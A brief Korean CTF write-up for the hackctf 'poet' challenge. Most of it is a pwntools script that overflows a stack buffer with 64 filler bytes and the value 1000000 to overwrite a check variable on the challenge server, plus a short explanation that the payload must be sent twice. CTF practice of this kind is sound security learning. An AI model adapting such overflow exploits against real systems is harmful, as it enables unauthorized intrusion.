CTF write-up/hackctf
[hack-ctf]poet
youngsouk
2019. 7. 15. 08:31
from pwn import *
#p = process('./poet')
p = remote('ctf.j0n9hyun.xyz', 3014)
context.log_level="debug"
reward = 0x00000000004007E6
p.recv()
payload = 'a' * 0x40 + p64(1000000)
p.sendline(payload)
p.recv()
pause()
p.sendline(payload)
p.interactive()
bof 터뜨려서 값을 정확히 1000000으로 바꾸면 된다. 다만 첫번째에 입력받은 뒤 초기화가 되기때문에 2번째에 입력받을 때 다시 넣어주어야한다.